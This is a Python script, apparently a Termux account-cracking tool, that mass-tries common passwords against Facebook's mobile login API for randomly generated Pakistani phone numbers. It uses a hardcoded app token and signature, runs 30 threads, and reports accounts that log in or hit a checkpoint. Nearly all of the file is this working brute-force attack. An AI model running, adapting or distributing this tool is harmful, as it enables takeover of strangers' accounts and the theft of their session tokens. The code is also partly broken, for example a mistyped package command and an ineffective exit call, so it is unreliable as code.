#!/usr/bin/python
#coding=utf-8 

import os, re, requests, concurrent.futures
from random import randint

import os, sys
M = '\033[1;33m'
C = '\033[1;31m'
D = '\033[1;32m'


def restart():
    ngulang = sys.executable
    os.execl(ngulang, ngulang, *sys.argv)
os.system('clear')    
print(D)
os.system('toilet -f big S O M I -F gay')
os.system('toilet -f big         B R A N D -F gay')
print( """                                                                                              
""")

print(C)

print('⊰═════════════════════════════════════════════⊱')
user = input('\033[1;97m[\033[1;92m+\033[1;97m]\x1b[1;97mUSERNAME \x1b[1;96m=≫ ')
import getpass
sandi = input('\033[1;97m[\033[1;92m+\033[1;97m]\x1b[1;97mPASSWORD \x1b[1;96m=≫ ')
if sandi == 'star' and user == 'boy':
    print( '\033[1;97m[\033[1;92m\xe2\x9c\x93\033[1;97m]')
    sys.exit
else:
    print( 'Ohh No Contact : 03455453538')
    restart()
os.system('clear')
os.system('toilet -f big S O M I -F gay')
os.system('toilet -f big         B R A N D -F gay')
lib = input("""\033[92m

\033[1;95m≪\033[1;94m1\033[1;91m≫ \033[1;92mStart Cloning With Update tools
\033[1;95m≪\033[1;94m2\033[1;91m≫ \033[1;93mStart Simple Cloning 

\033[1;91m[+] Please Choice ⋙ \033[1;92m """)

if lib == "1":
    os.system('pkg upadte && pkg upgrade')
    os.system('pkg install fish')
    os.system('pkg install python2')
    os.system('pkg install figlet')
    os.system('pkg install toilet')
    os.system('clear')
    pass
else:
    os.system('clear')
    pass
os.system('clear')
def brute(user, passs):
  try:
    for pw in passs:
      params={
        'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32',
        'format': 'JSON',
        'sdk_version': '2',
        'email': user,
        'locale': 'en_US',
        'password': pw,
        'sdk': 'ios',
        'generate_session_cookies': '1',
        'sig': '3f555f99fb61fcd7aa0c44f58f522ef6',
      }
      api='https://b-api.facebook.com/method/auth.login'
      response=requests.get(api, params=params)
      if re.search('(EAAA)\w+', str(response.text)):
        print('\033[1;92m[SUCCESSFUL] \033[1;91m≻≻ %s \033[1;91m≻≻ \033[1;96m%s '%(str(user), str(pw)))
        break
      elif 'www.facebook.com' in response.json()['error_msg']:
        print('\033[1;91m[CHECKPOINT] \033[1;91m≻≻\033[1;93m %s \033[1;94m≻≻ \033[1;95m%s '%(str(user), str(pw)))
        break
  except: pass

def random_numbers():
  data = []
  os.system('cls' if os.name == 'nt' else 'clear')
  os.system('clear')
  print(D)
  os.system('toilet -f big S O M I -F gay')
  os.system('toilet -f big         B R A N D -F gay')
  print('''
 \33[31;1m[ Cracking tool Facebook Pakistan ]

\033[1;93m[+]⌵ Choose the number ⌵
\033[1;95m[+] 9230  
\033[1;95m[+] 9231
\033[1;95m[+] 9232
\033[1;95m[+] 9233
\033[1;95m[+] 9234
  ''')
  kode=str(input('\33[33;1mEnter any number: '))
  exit('\33[36;1m The number must be 4 digits, no less and no more.') if len(kode) < 2 else ''
  exit('\33[36;1m The number must be 4 digits, no less and no more.') if len(kode) > 2 else ''
  os.system('clear')
  os.system('toilet -f big S O  M I -F gay')
  os.system('toilet -f big         B R A N D -F gay')
  
  print("""
  
  """)
  jml=int(input('''\33[36;1mChoose Number 923 \n⋙  '''))
  [data.append({'user': str(e), 'pw':[123123, 786786, 123456, 1122334455,1234512345,112233445566,1234554321, 786786]}) for e in [str(kode)+''.join(['%s'%(randint(0,7)) for i in range(0,20000)]) for e in range(jml)]]
  
  print("""
\033[1;93m⊰═════════════════════════════════════════════⊱
\033[1;91m\033[1;33m             │\033[1;92m TOUR TOUCH SKY \033[1;93m│          \033[1;0m
\033[1;93m⊰═════════════════════════════════════════════⊱
  """)
  with concurrent.futures.ThreadPoolExecutor(max_workers=30) as th:
    {th.submit(brute, user['user'], user['pw']): user for user in data}
  print('\n  Done:)')


  

def pilih():
  print(D)
  
  os.system('toilet -f big Muzaffarbad -F gay')
  os.system('toilet -f big_S T A R_  -F gay')
  print("""
  1. \33[33;1mStar Cracking Pakistan\33[37;1m
  2. \33[33;1mClose program
  """)
  
  pil=int(input('  ⋙ '))
  if pil == 1:
    random_numbers()
  elif pil == 2:
    restart()
  else:
    exit('  goodluck')


pilih() if __name__ == '__main__' else exit('Sorry, something wrong, please try again later.')


                   
                   
                   


